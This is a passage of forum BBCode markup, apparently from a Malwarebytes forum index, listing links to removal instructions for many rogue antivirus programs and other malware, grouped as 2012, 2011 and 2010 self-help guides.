BestSpeed[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112594]Removal instructions for Windows Premium Defender[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112323]Removal instructions for Trojan.Ransom.AI[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112195]Removal instructions for VClear[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112178]Removal instructions for Windows Expert Series[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=112161]How to deal with DNS Hijackers[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111901]Removal instructions for FastCure[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111880]Removal instructions for Windows Interactive Security[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111737]Removal instructions for BoanCode[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111722]Removal instructions for AnyBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111712]Removal instructions for Windows Custom Management[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111528]Removal instructions for SolutionPC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111395]Removal instructions for Windows Maintenance Guard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111378]Removal instructions for PcCare[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111256]Removal instructions for Windows Secure Web Patch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111228]Removal instructions for PrivacyTop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=111089]Removal instructions for Best Antivirus Software[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110941]Removal instructions for Windows Custom Safety[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110908]Removal instructions for PowerBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110761]Removal instructions for Windows PC Aid[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110630]Removal instructions for Live Security Platinum[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110565]Removal instructions for Defence Privacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110494]Removal instructions for Windows Antivirus Rampart[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110374]Removal instructions for ProtectPC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110341]Removal instructions for Windows Guard Tools[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110212]Removal instructions for Check119[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=110073]Removal instructions for RealBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109986]Removal instructions for Windows Secure Surfer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109934]Removal instructions for Cen Protect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109828]Removal instructions for Total Anti Malware Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109783]Removal instructions for Windows Abnormality Checker[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109662]Removal instructions for InterBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109589]Removal instructions for Windows Advanced User Patch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109515]Removal instructions for SpeedPlus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109382]Removal instructions for Windows Safety Module[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109293]Removal instructions for Windows Safety Checkpoint[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109256]Removal instructions for MyDefender[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=109119]Removal instructions for Windows Efficiency Accelerator[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108957]Removal instructions for RealSpeed[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108936]Removal instructions for Windows Antivirus Care[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108800]Removal instructions for Windows Guard Solutions[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108641]Removal instructions for PrivacyCut[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108628]Removal instructions for Windows Foolproof Protector[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108495]Removal instructions for TotalBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108303]Removal instructions for Windows Efficiency Reservoir[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108272]Removal instructions for Advanced Antispyware Solution[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108126]Removal instructions for Windows Warding System[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=108014]Removal instructions for SMART HDD[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107968]Removal instructions for Windows Trouble Taker[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107849]Removal instructions for PrivacyG[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107734]Removal instructions for Windows AntiHazard Helper[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107641]Removal instructions for Security Shield 2012[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107596]Removal instructions for Windows Guardian Angel[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107384]Removal instructions for Smart Fortress 2012[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107349]Removal instructions for Windows Risk Minimizer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107298]Removal instructions for Best Virus Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107169]Removal instructions for Windows Tools Patch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107136]Removal instructions for Cool-PC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=107041]Removal instructions for Antimalware PC Safety[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106931]Removal instructions for InternetBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106906]Removal instructions for Antivirus Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106765]Removal instructions for Windows Smart Partner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106642]Removal instructions for Home Malware Cleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106608]Removal instructions for Windows Functionality Checker[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106299]Removal instructions for Security Scanner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106015]Removal instructions for Internet Security[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=106066]Removal instructions for EveryClear[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105900]Removal instructions for InfoSeven[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105766]Removal instructions for Smart Protection 2012[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105718]Removal instructions for PCMaster Antispyware[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105598]Removal instructions for PCspeed[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105420]Removal instructions for Antivirus Smart Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105357]Removal instructions for Com-doumi[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105187]Removal instructions for Malware Protection Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105047]Removal instructions for PCupgrade[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=105030]Removal instructions for BoanCatch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=104798]Removal instructions for CYAK[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=104627]Removal instructions for Internet Security Guard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=104589]Removal instructions for PC Spider[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=104373]Removal instructions for MicroVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=104156]Removal instructions for CleanerCom[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=104073]Removal instructions for ProtectOn[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=103770]Removal instructions for MyInfoBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=103514]Removal instructions for BootCare[/url]\r\n[/list][/list]\r\n[list]\r\n[*][color=#00BFFF][b]2011 Self Help Guides[/b][/color][list]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=103433]Removal instructions for Super AV[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=103157]Removal instructions for Home Security Solutions[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=102963]Removal instructions for Security Monitor 2012[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=102898]Removal instructions for InfoManager[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=102656]Removal instructions for Win 7 Antivirus 2012 (and its clones)[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=102371]Removal instructions for Antivirii 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=102310]Removal instructions for HomeBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=100844]Removal instructions for XP Security 2012 (and its clones)[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=101997]Removal instructions for Protect Cop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=101660]Removal instructions for PowerPc[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=101644]Removal instructions for DoctorCom[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=101406]Removal instructions for VirusSecurity[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=101167]Removal instructions for SweeperLab[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=101107]Removal instructions for DataSave[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=100615]Removal instructions for CleanCatch[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=100570]Removal instructions for Cloud AV 2012[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=100404]Removal instructions for PrivacyUp[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=100142]Removal instructions for CoreScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=100097]Removal instructions for AV Protection 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99970]Removal instructions for WindowPC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99731]Removal instructions for AnyCop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99664]Removal instructions for AV Security 2012[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99446]Removal instructions for Protect Keep[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99247]Removal instructions for Privacy Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99218]Removal instructions for Anti Avoid[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=99002]Removal instructions for ProtectCode[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=98819]Removal instructions for VirusKorea[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=98813]Removal instructions for PatchUp_Plus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=98542]Removal instructions for System Security 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=98281]Removal instructions for FastScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=98199]Removal instructions for BoanKorea[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=98048]Removal instructions for AV Protection Online[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=97880]Removal instructions for PC Speed Up[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=97788]Removal instructions for VirusScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=97530]Removal instructions for Cloud Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=97313]Removal instructions for Guard Online[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=97240]Removal instructions for RealCleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=97136]Removal instructions for AV Guard Online[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=96774]Removal instructions for PCPlus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=96691]Removal instructions for Security Sphere (2012)[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=96440]Removal instructions for VaccineCom[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=96173]Removal instructions for MicroPop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=96103]Removal instructions for Privacy.I[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95943]Removal instructions for dr.Boan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95741]Removal instructions for Windows Live Protect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95552]Removal instructions for InfoBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95497]Removal instructions for HelpPrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95291]Removal instructions for VIHunter[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95101]Removal instructions for Cleancert[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=95063]Removal instructions for OpenCloud Security[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=94808]Removal instructions for BoanCop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=94576]Removal instructions for Windows Easy Warden[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=94490]Removal instructions for Antivirus 2011 Edition limitée[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=94176]Removal instructions for OpenCloud Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=93912]Removal instructions for Windows Salvor Tool[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=93822]Removal instructions for MainPrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=93494]Removal instructions for BoanClear[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=93192]Removal instructions for Home Safety Essentials[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=93114]Removal instructions for SafePrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=92797]Removal instructions for PrivacyBoho[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=92498]Removal instructions for Wolfram Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=92228]Removal instructions for ErrorDoctor[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=91879]Removal instructions for Defensevirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=91811]Removal instructions for InfoGuard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=91704]Removal instructions for PrivacyCode[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=91228]Removal instructions for CodeScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=91152]Removal instructions for DualVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=90878]Removal instructions for MacroVirus On-call[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=90568]Removal instructions for BlueFlare Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=90452]Removal instructions for Zentom System Guard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=90127]Removal instructions for BoanKing[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=89877]Removal instructions for Security Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=89824]Removal instructions for Security Solution 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=89285]Removal instructions for PCMedic[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=89210]Removal instructions for Windows Test Master[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=88906]Removal instructions for Windows Easy Supervisor[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=88708]Removal instructions for Windows Proofness Guarantor[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=88636]Removal instructions for Personal Shield Pro[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=88418]Removal instructions for ClearPC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=88158]Removal instructions for Windows Antivirus System[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=88099]Removal instructions for Security Shield (2)[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=87313]Removal instructions for Windows Accelerating Utility[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=87114]Removal instructions for MicroPC[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=86955]Removal instructions for Windows Examination Utility[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=86861]Removal instructions for Milestone Antivirus[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=86561]Removal instructions for BasicPrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=86362]Removal instructions for Windows Salvage System[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=86279]Removal instructions for PrivacyAlpha[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=86104]Removal instructions for Windows Accidents Prevention[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=85810]Removal instructions for Windows Necessary Firewall[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=85754]Removal instructions for VaccineU[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=85535]Removal instructions for Windows Profile System[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=85286]Removal instructions for Windows Protection Servant[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=85033]Removal instructions for Essential Cleaner[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=84832]Removal instructions for Windows Activity Inspector[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=84736]Removal instructions for InfoKeeper[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=84637]Removal instructions for Windows Work Catalyst[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=84475]Removal instructions for Windows Stability Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=84119]Removal instructions for Windows Oversight Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=84108]Removal instructions for PrivacyKey[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=83773]Removal instructions for SelfPrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=83523]Removal instructions for PrivacyView[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=83107]Removal instructions for Security Shield[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=82888]Removal instructions for Antivirus Protection Trial[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=82876]Removal instructions for PC-Safe[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=82696]Removal instructions for XP Total Security 2011 (and its clones)[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=82613]Removal instructions for Antivirus Clean 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=82084]Removal instructions for VaccineCore[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=82028]Removal instructions for WindowsFixDisk[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=81677]Removal instructions for Boan119[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=81281]Removal instructions for WindowsRestore[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=81102]Removal instructions for MS Removal Tool[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=80941]Removal instructions for BoanSupport[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=80557]Removal instructions for HomeClean[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=80422]Removal instructions for Windows Passport Utility[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=79675]Removal instructions for AdStop[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=79287]Removal instructions for Windows Recovery[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=79079]Removal instructions for Windows Lowlevel Solution[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=78835]Removal instructions for VaccineScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=78453]Removal instructions for Windows Emergency System [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=78386]Removal instructions for Windows Efficiency Magnifier[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=78054]Removal instructions for AntiGuard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=77717]Removal instructions for Windows Troubles Remover[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=77635]Removal instructions for ProPrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=77433]Removal instructions for AntiVirus AntiSpyware 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=77035]Removal instructions for Windows DebugSystem[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=76949]Removal instructions for ZeroVaccine [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=76745]Removal instructions for Windows Troubles Analyzer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=76453]Removal instructions for PcVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=66064]Removal instructions for System Tool[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=76239]Removal instructions for Windows Shield Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=76002]Removal instructions for SpecialGuard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=75600]Removal instructions for Windows Risks Eliminator[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=75505]Removal instructions for Safecare[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=75409]Removal instructions for Windows Utility Tool[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=75330]Removal instructions for Windows Optimal Solution[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=75264]Removal instructions for PrivacyHidden[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=74919]Removal instructions for SmartScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=74722]Removal instructions for \"Nice picture\" Backdoor.Agent[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=74559]Removal instructions for HomeVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=74306]Removal instructions for Windows Health Center[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=74028]Removal instructions for MyPCcheck[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=73934]Removal instructions for WindowsDisk[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=73614]Removal instructions for Spyware Protection[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=73404]Removal instructions for LiveBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=73330]Removal instructions for MemoryOptimizer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=72980]Removal instructions for Windows Optimization & Security[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=72830]Removal instructions for HDDLow[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=72749]Removal instructions for VaccineClean[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=72454]Removal instructions for SmartHDD[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=72243]Removal instructions for MyDisk[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=72151]Removal instructions for EasyVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=71848]Removal instructions for PCoptimizer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=71683]Removal instructions for PrivacyRight[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=71641]Removal instructions for WiseVaccine[/url]\r\n[/list][/list]\r\n\r\n[list]\r\n[*][color=#00BFFF][b]2010 Self Help Guides[/b][/color]\r\n[list]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=71380]Removal instructions for WinDefrag[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=71203]Removal instructions for PrivacyGuard 2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=71158]Removal instructions for Vaccine2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70858]Removal instructions for NewVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70697]Removal instructions for HDDTools[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70632]Removal instructions for Ddosclean[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70478]Removal instructions for VaccineProgram[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70117]Removal instructions for SpyCare[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70043]Removal instructions for WinHDD[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69758]Removal instructions for PCclear[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69655]Removal instructions for CleanV[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69458]Removal instructions for UserVaccine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69047]Removal instructions for PowerCare[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68934]Removal instructions for ProtectOne[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68800]Removal instructions for UltraDefragger[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68733]Removal instructions for Qscan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68408]Removal instructions for Security Inspector 2010[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68258]Removal instructions for ScanZero[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67800]Removal instructions for SearchGuard[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67735]Removal instructions for Security Essentials 2011[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67633]Removal instructions for SafetyBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67529]Removal instructions for BestBoan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67128]Removal instructions for DataProtect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=66942]Removal instructions for AntiPrivacy[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=66870]Removal instructions for AdSafer[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=66617]Removal instructions for HDDDefragmenter[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=66396]Removal instructions for AntiProtect[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=66188]Removal instructions for CleanScan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=65779]Removal instructions for NewClean[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=65527]Removal instructions for IDboan[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=65308]Removal instructions for Scan119[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=64987]Removal instructions for InfoDoctor[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=64974]Removal instructions for VaccineKiller[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=64839]Removal instructions for InfoSecret[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=64533]Removal instructions for Smart Engine[/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=64337]Removal instructions for AntiVirus Studio 2010 [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=64192]Removal instructions for VaccineLab [/url] \r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63997]Removal instructions for RegistryClever [/url]\r\n[*][url=http://forums.malwarebytes.org/index.php?showtopic=63818]Removal instructions for Malware Destructor 